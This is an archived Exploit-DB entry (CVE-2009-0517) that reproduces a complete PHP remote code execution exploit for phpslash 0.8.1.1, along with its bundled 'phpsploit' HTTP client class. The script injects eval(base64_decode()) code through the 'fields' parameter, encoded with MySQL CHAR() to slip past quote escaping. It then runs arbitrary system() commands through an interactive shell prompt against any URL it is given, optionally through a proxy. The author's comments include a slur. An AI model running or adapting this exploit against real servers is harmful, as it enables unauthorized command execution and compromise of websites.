phpslash <= 0.8.1.1 - Remote Code Execution Exploit

2009-02-02T00:00:00
ID EDB-ID:7948
Type exploitdb
Reporter DarkFig
Modified 2009-02-02T00:00:00

Description

phpslash <= 0.8.1.1 Remote Code Execution Exploit. CVE-2009-0517. Webapps exploit for php platform

                                        
                                            #!/usr/bin/php -q
&lt;?php
#
# phpslash &lt;= 0.8.1.1 Remote Code Execution Exploit
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# RCE with no special rights (guest).
# No special PHP conditions required.
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# #0 It was a private sploit, but I decided to publish
# it #1 You did the fag on that one bro, it will not happen
# again =). #2 Don't try to use it on hzv, I helped them
# to patch this one before I publish it =)
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# Exploitation steps:
# 1 - include/class/tz_functions.inc tz_strftime()
# 2 - include/class/tz_functions.inc tz_generic()
# 3 - include/tz_env.class           generic()
#
error_reporting( E_ALL ^ E_NOTICE );

// Main function
function main()
{
	// :)
	$web = new phpsploit();
	$web-&gt;agent( 'Mozilla Firefox' );

	// Hey ya :)
	head();

	// Target
	$url = get_p( 'url', true );
	
	// Proxy options
	$prh = get_p( 'proxhost' );
	$pra = get_p( 'proxauth' );

	// Use a proxy ?
	if( $prh )
	{
		// host:ip
		$web-&gt;proxy( $prh );
		
		// Authentication
		if( $pra )
		$web-&gt;proxyauth( $pra );
	}
	
	// Single quote bypass
	$byp = "1');";

	// PHP code
	$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';

	// Separator
	$s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' );
	$c_sep = "print('$s_sep');";

	// Final PHP code
	$final = $byp . $c_sep  . $php . $c_sep  . 'exit();//';

	// Welcome guess !
	while( ($cmd = cmd_prompt()) !== false )
	{
		// magic_quotes_gpc bypass
		$web-&gt;addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) );
	
		// Go =]
		$web-&gt;get( $url . 'index.php?fields=' . to_char( $final ) . ',1' );

		// Result
		$res = explode( $s_sep, $web-&gt;getcontent() );

		// Erf 
		if( !isset( $res[1] ) )
		{
			print "\nFailed";
			exit(1);
		}
		// Cool
		else
		{
			if( empty( $res[1] ) )
			print "\nNo output: system() disabled OR cmd failed OR cmd without output";
			
			else
			print "\n" . $res[1];
		}
	}
	
	return;
}

// No more bug with " and $
function add_slashes( $str )
{
	return str_replace( '$', '\\$', addslashes( $str ) );
}

// Command prompt
function cmd_prompt()
{
	print "\nshell&gt;";

	$cmd = trim( fgets( STDIN ) );
	
	// Wanna stop =( ?
	if( in_array( strtolower( $cmd ) , array( 'exit', 'quit' ) ) )
	return false;
	
	else 
	return $cmd;
}

// MySQL CHAR() encoding
function to_char( $data )
{
	$chars = 'CHAR(';
	$len   = strlen( $data );
	
	for( $i = 0; $i &lt; $len; $i++ )
	{
		$chars .= ord( $data[ $i ] );
		
		if( $i != $len-1 )
		$chars .= ',';
	}
	
	return $chars . ')';
}

// CLI params
function get_p( $p, $exit = false )
{
	foreach( $_SERVER['argv'] as $key =&gt; $value )
	{
		if( $value === '-' . $p )
		{
			if( isset( $_SERVER['argv'][ $key+1 ] ) &&
			   !empty( $_SERVER['argv'][ $key+1 ] ) )
			{					
				return $_SERVER['argv'][ $key+1 ];
			}
			else
			{
				if( $exit )
				usage();
					
				return true;
			}
		}
	}
		
	if( $exit )
	usage();
		
	return false;
}
	
// Headers =)
function head()
{
	print "\nphpslash &lt;= 0.8.1.1 Remote Code Execution Exploit\n";
	print "-------------------------------------------------\n\n";
	print " About: \n";
	print "  by DarkFig  &lt; gmdarkfig (at) gmail (dot) com &gt;\n";
	print "  http://acid-root.new.fr/\n";
	print "  #acidroot@irc.worldnet.net\n\n";
	
	return;
}

// Usage, can help..
function usage()
{
	print " Usage:\n";
	print "  php spl.php -url &lt;website&gt; [options]\n\n";
	print " Example:\n";
	print "  php spl.php -url http://victim.com/\n\n";
	print " Options:\n";
	print "  -proxhost &lt;ip:port&gt; if you wanna use a proxy\n";
	print "  -proxauth &lt;usr:pwd&gt; proxy with authentication\n";
	
	exit(0);
}

// Run baby
main();

/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 4 / PHP 5
 * VERSION:        2.1
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 *
 * [2008-08-29] (2.1)
 *  * New: The showheader()/showcookie() functions can now return an array
 *  * Bug #3 fixed: Problem concerning some servers for the main function
 *
 * [2007-06-10] (2.0)
 *  * Code: Code optimization
 *  * New: Compatible with PHP 4 by default
 *
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */

class phpsploit
{
	var $proxyhost;
	var $proxyport;
	var $host;
	var $path;
	var $port;
	var $method;
	var $url;
	var $packet;
	var $proxyuser;
	var $proxypass;
	var $header;
	var $cookie;
	var $data;
	var $boundary;
	var $allowredirection;
	var $last_redirection;
	var $cookiejar;
	var $recv;
	var $cookie_str;
	var $header_str;
	var $server_content;
	var $server_header;
	

	/**
	 * This function is called by the
	 * get()/post()/formdata() functions.
	 * You don't have to call it, this is
	 * the main function.
	 *
	 * @access private
	 * @return string $this-&gt;recv ServerResponse
	 * 
	 */
	function sock()
	{
		if(!empty($this-&gt;proxyhost) && !empty($this-&gt;proxyport))
		   $socket = @fsockopen($this-&gt;proxyhost,$this-&gt;proxyport);
		else
		   $socket = @fsockopen($this-&gt;host,$this-&gt;port);
	
		if(!$socket)
		   die("Error: Host seems down");
		
		if($this-&gt;method=='get')
		   $this-&gt;packet = 'GET '.$this-&gt;url." HTTP/1.1\r\n";
		   
		elseif($this-&gt;method=='post' or $this-&gt;method=='formdata')
		   $this-&gt;packet = 'POST '.$this-&gt;url." HTTP/1.1\r\n";
		   
		else
		   die("Error: Invalid method");
		
		if(!empty($this-&gt;proxyuser))
		   $this-&gt;packet .= 'Proxy-Authorization: Basic '.base64_encode($this-&gt;proxyuser.':'.$this-&gt;proxypass)."\r\n";
		
		if(!empty($this-&gt;header))
		   $this-&gt;packet .= $this-&gt;showheader();
		   
		if(!empty($this-&gt;cookie))
		   $this-&gt;packet .= 'Cookie: '.$this-&gt;showcookie()."\r\n";

		$this-&gt;packet .= 'Host: '.$this-&gt;host."\r\n";
		$this-&gt;packet .= "Connection: Close\r\n";
		
		if($this-&gt;method=='post')
		{
			$this-&gt;packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
			$this-&gt;packet .= 'Content-Length: '.strlen($this-&gt;data)."\r\n\r\n";
			$this-&gt;packet .= $this-&gt;data."\r\n";
		}
		elseif($this-&gt;method=='formdata')
		{
			$this-&gt;packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this-&gt;boundary."\r\n";
			$this-&gt;packet .= 'Content-Length: '.strlen($this-&gt;data)."\r\n\r\n";
			$this-&gt;packet .= $this-&gt;data;
		}

		$this-&gt;packet .= "\r\n";
		$this-&gt;recv = '';

		fputs($socket, $this-&gt;packet);

		while(!feof($socket))
		   $this-&gt;recv .= fgets($socket);

		fclose($socket);

		if($this-&gt;cookiejar)
		   $this-&gt;getcookie();

		if($this-&gt;allowredirection)
		   return $this-&gt;getredirection();
		else
		   return $this-&gt;recv;
	}
	

	/**
	 * This function allows you to add several
	 * cookies in the request.
	 * 
	 * @access  public
	 * @param   string cookn CookieName
	 * @param   string cookv CookieValue
	 * @example $this-&gt;addcookie('name','value')
	 * 
	 */
	function addcookie($cookn,$cookv)
	{
		if(!isset($this-&gt;cookie))
		   $this-&gt;cookie = array();

		$this-&gt;cookie[$cookn] = $cookv;
	}


	/**
	 * This function allows you to add several
	 * headers in the request.
	 *
	 * @access  public
	 * @param   string headern HeaderName
	 * @param   string headervalue Headervalue
	 * @example $this-&gt;addheader('Client-IP', '128.5.2.3')
	 * 
	 */
	function addheader($headern,$headervalue)
	{
		if(!isset($this-&gt;header))
		   $this-&gt;header = array();
		   
		$this-&gt;header[$headern] = $headervalue;
	}
	
	/**
	 * This function allows you to use an
	 * http proxy server. Several methods
	 * are supported.
	 * 
	 * @access  public
	 * @param   string proxy ProxyHost
	 * @param   integer proxyp ProxyPort
	 * @example $this-&gt;proxy('localhost',8118)
	 * @example $this-&gt;proxy('localhost:8118')
	 * 
	 */
	function proxy($proxy,$proxyp='')
	{
		if(empty($proxyp))
		{
			$proxarr = explode(':',$proxy);
			$this-&gt;proxyhost = $proxarr[0];
			$this-&gt;proxyport = (int)$proxarr[1];
		}
		else 
		{
			$this-&gt;proxyhost = $proxy;
			$this-&gt;proxyport = (int)$proxyp;
		}

		if($this-&gt;proxyport &gt; 65535)
		   die("Error: Invalid port number");
	}
	

	/**
	 * This function allows you to use an
	 * http proxy server which requires a
	 * basic authentification. Several
	 * methods are supported:
	 *
	 * @access  public
	 * @param   string proxyauth ProxyUser
	 * @param   string proxypass ProxyPass
	 * @example $this-&gt;proxyauth('user','pwd')
	 * @example $this-&gt;proxyauth('user:pwd');
	 * 
	 */
	function proxyauth($proxyauth,$proxypass='')
	{
		if(empty($proxypass))
		{
			$posvirg = strpos($proxyauth,':');
			$this-&gt;proxyuser = substr($proxyauth,0,$posvirg);
			$this-&gt;proxypass = substr($proxyauth,$posvirg+1);
		}
		else
		{
			$this-&gt;proxyuser = $proxyauth;
			$this-&gt;proxypass = $proxypass;
		}
	}


	/**
	 * This function allows you to set
	 * the 'User-Agent' header.
	 * 
	 * @access  public
	 * @param   string useragent Agent
	 * @example $this-&gt;agent('Firefox')
	 * 
	 */
	function agent($useragent)
	{
		$this-&gt;addheader('User-Agent',$useragent);
	}

	
	/**
	 * This function returns the headers
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;header_str Headers
	 * @return  array  $this-&gt;head Headers
	 * @example $this-&gt;showheader()
	 * @example $this-&gt;showheader(1)
	 * 
	 */
	function showheader($array='')
	{
		$this-&gt;header_str = '';
		
		if(!isset($this-&gt;header))
		   return;
		   
		if(!empty($array))
			return $this-&gt;header;
			
		foreach($this-&gt;header as $name =&gt; $value)
		   $this-&gt;header_str .= $name.': '.$value."\r\n";
		   
		return $this-&gt;header_str;
	}

	
	/**
	 * This function returns the cookies
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;cookie_str Cookies
	 * @return  array  $this-&gt;cookie Cookies
	 * @example $this-&gt;showcookie()
	 * @example $this-&gt;showcookie(1)
	 * 
	 */
	function showcookie($array='')
	{
		if(!isset($this-&gt;cookie))
		   return;
		 
		if(!empty($array))
			return $this-&gt;cookie;
		
		$this-&gt;cookie_str = '';
		
		foreach($this-&gt;cookie as $name =&gt; $value)
		   $this-&gt;cookie_str .= $name.'='.$value.'; ';

		return $this-&gt;cookie_str;
	}


	/**
	 * This function returns the last
	 * formed http request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;packet HttpPacket
	 * @example $this-&gt;showlastrequest()
	 * 
	 */
	function showlastrequest()
	{
		if(!isset($this-&gt;packet))
		   return;
		else
		   return $this-&gt;packet;
	}


	/**
	 * This function sends the formed
	 * http packet with the GET method.
	 * 
	 * @access  public
	 * @param   string url Url
	 * @return  string $this-&gt;sock()
	 * @example $this-&gt;get('localhost/index.php?var=x')
	 * @example $this-&gt;get('http://localhost:88/tst.php')
	 * 
	 */
	function get($url)
	{
		$this-&gt;target($url);
		$this-&gt;method = 'get';
		return $this-&gt;sock();
	}

	
	/**
	 * This function sends the formed
	 * http packet with the POST method.
	 *
	 * @access  public
	 * @param   string url  Url
	 * @param   string data PostData
	 * @return  string $this-&gt;sock()
	 * @example $this-&gt;post('http://localhost/','helo=x')
	 * 
	 */	
	function post($url,$data)
	{
		$this-&gt;target($url);
		$this-&gt;method = 'post';
		$this-&gt;data = $data;
		return $this-&gt;sock();
	}
	

	/**
	 * This function sends the formed http
	 * packet with the POST method using
	 * the multipart/form-data enctype.
	 * 
	 * @access  public
	 * @param   array array FormDataArray
	 * @return  string $this-&gt;sock()
	 * @example $formdata = array(
	 *                      frmdt_url =&gt; 'http://localhost/upload.php',
	 *                      frmdt_boundary =&gt; '123456', # Optional
	 *                      'var' =&gt; 'example',
	 *                      'file' =&gt; array(
	 *                                frmdt_type =&gt; 'image/gif',  # Optional
	 *                                frmdt_transfert =&gt; 'binary' # Optional
	 *                                frmdt_filename =&gt; 'hello.php,
	 *                                frmdt_content =&gt; '&lt;?php echo 1; ?&gt;'));
	 *          $this-&gt;formdata($formdata);
	 * 
	 */
	function formdata($array)
	{
		$this-&gt;target($array[frmdt_url]);
		$this-&gt;method = 'formdata';
		$this-&gt;data = '';
		
		if(!isset($array[frmdt_boundary]))
		   $this-&gt;boundary = 'phpsploit';
		else
		   $this-&gt;boundary = $array[frmdt_boundary];

		foreach($array as $key =&gt; $value)
		{
			if(!preg_match('#^frmdt_(boundary|url)#',$key))
			{
				$this-&gt;data .= str_repeat('-',29).$this-&gt;boundary."\r\n";
				$this-&gt;data .= 'Content-Disposition: form-data; name="'.$key.'";';
				
				if(!is_array($value))
				{
					$this-&gt;data .= "\r\n\r\n".$value."\r\n";
				}
				else
				{
					$this-&gt;data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";

					if(isset($array[$key][frmdt_type]))
					   $this-&gt;data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";

					if(isset($array[$key][frmdt_transfert]))
					   $this-&gt;data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

					$this-&gt;data .= "\r\n".$array[$key][frmdt_content]."\r\n";
				}
			}
		}

		$this-&gt;data .= str_repeat('-',29).$this-&gt;boundary."--\r\n";
		return $this-&gt;sock();
	}

	
	/**
	 * This function returns the content
	 * of the server response, without
	 * the headers.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this-&gt;server_content
	 * @example $this-&gt;getcontent()
	 * @example $this-&gt;getcontent($this-&gt;get('http://localhost/'))
	 * 
	 */
	function getcontent($code='')
	{
		if(empty($code))
		   $code = $this-&gt;recv;

		$code = explode("\r\n\r\n",$code);
		$this-&gt;server_content = '';
		
		for($i=1;$i&lt;count($code);$i++)
		   $this-&gt;server_content .= $code[$i];

		return $this-&gt;server_content;
	}

	
	/**
	 * This function returns the headers
	 * of the server response, without
	 * the content.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this-&gt;server_header
	 * @example $this-&gt;getcontent()
	 * @example $this-&gt;getcontent($this-&gt;post('http://localhost/','1=2'))
	 * 
	 */
	function getheader($code='')
	{
		if(empty($code))
		   $code = $this-&gt;recv;

		$code = explode("\r\n\r\n",$code);
		$this-&gt;server_header = $code[0];
		
		return $this-&gt;server_header;
	}

	
	/**
	 * This function is called by the
	 * cookiejar() function. It adds the
	 * value of the "Set-Cookie" header
	 * in the "Cookie" header for the
	 * next request. You don't have to
	 * call it.
	 * 
	 * @access private
	 * @param  string code ServerResponse
	 * 
	 */
	function getcookie()
	{
		foreach(explode("\r\n",$this-&gt;getheader()) as $header)
		{
			if(preg_match('/set-cookie/i',$header))
			{
				$fequal = strpos($header,'=');
				$fvirgu = strpos($header,';');
				
				// 12=strlen('set-cookie: ')
				$cname  = substr($header,12,$fequal-12);
				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
				
				$this-&gt;cookie[trim($cname)] = trim($cvalu);
			}
		}
	}


	/**
	 * This function is called by the
	 * get()/post() functions. You
	 * don't have to call it.
	 *
	 * @access  private
	 * @param   string urltarg Url
	 * @example $this-&gt;target('http://localhost/')
	 * 
	 */
	function target($urltarg)
	{
		if(!ereg('^http://',$urltarg))
		   $urltarg = 'http://'.$urltarg;
		
		$urlarr = parse_url($urltarg);
		
		if(!isset($urlarr['path']) || empty($urlarr['path']))
		   die("Error: No path precised");
		
		$this-&gt;url  = $urlarr['path'];
		
		if(isset($urlarr['query']))
		   $this-&gt;url .= '?'.$urlarr['query'];
		
		$this-&gt;port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
		$this-&gt;host = $urlarr['host'];
		
		if($this-&gt;port != '80')
		   $this-&gt;host .= ':'.$this-&gt;port;

		$this-&gt;path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
		
		if($this-&gt;port &gt; 65535)
		   die("Error: Invalid port number");
	}
	
	
	/**
	 * If you call this function,
	 * the script will extract all
	 * 'Set-Cookie' headers values
	 * and it will automatically add
	 * them into the 'Cookie' header
	 * for all next requests.
	 *
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this-&gt;cookiejar(0)
	 * @example $this-&gt;cookiejar(1)
	 * 
	 */
	function cookiejar($code)
	{
		if($code=='0')
		   $this-&gt;cookiejar=FALSE;

		elseif($code=='1')
		   $this-&gt;cookiejar=TRUE;
	}


	/**
	 * If you call this function,
	 * the script will follow all
	 * redirections sent by the server.
	 * 
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this-&gt;allowredirection(0)
	 * @example $this-&gt;allowredirection(1)
	 * 
	 */
	function allowredirection($code)
	{
		if($code=='0')
		   $this-&gt;allowredirection=FALSE;
		   
		elseif($code=='1')
		   $this-&gt;allowredirection=TRUE;
	}

	
	/**
	 * This function is called if
	 * allowredirection() is enabled.
	 * You don't have to call it.
	 *
	 * @access private
	 * @return string $this-&gt;get('http://'.$this-&gt;host.$this-&gt;path.$this-&gt;last_redirection)
	 * @return string $this-&gt;get($this-&gt;last_redirection)
	 * @return string $this-&gt;recv;
	 * 
	 */
	function getredirection()
	{
		if(preg_match('/(location|content-location|uri): (.*)/i',$this-&gt;getheader(),$codearr))
		{
			$this-&gt;last_redirection = trim($codearr[2]);
			
			if(!ereg('://',$this-&gt;last_redirection))
			   return $this-&gt;get('http://'.$this-&gt;host.$this-&gt;path.$this-&gt;last_redirection);

			else
			   return $this-&gt;get($this-&gt;last_redirection);
		}
		else
		   return $this-&gt;recv;
	}


	/**
	 * This function allows you
	 * to reset some parameters.
	 * 
	 * @access  public
	 * @param   string func Param
	 * @example $this-&gt;reset('header')
	 * @example $this-&gt;reset('cookie')
	 * @example $this-&gt;reset()
	 * 
	 */
	function reset($func='')
	{
		switch($func)
		{
			case 'header':
			$this-&gt;header = array();
			break;
				
			case 'cookie':
			$this-&gt;cookie = array();
			break;
				
			default:
			$this-&gt;cookiejar = '';
			$this-&gt;header = array();
			$this-&gt;cookie = array();
			$this-&gt;allowredirection = '';
			break;
		}
	}
}

?&gt;

# milw0rm.com [2009-02-02]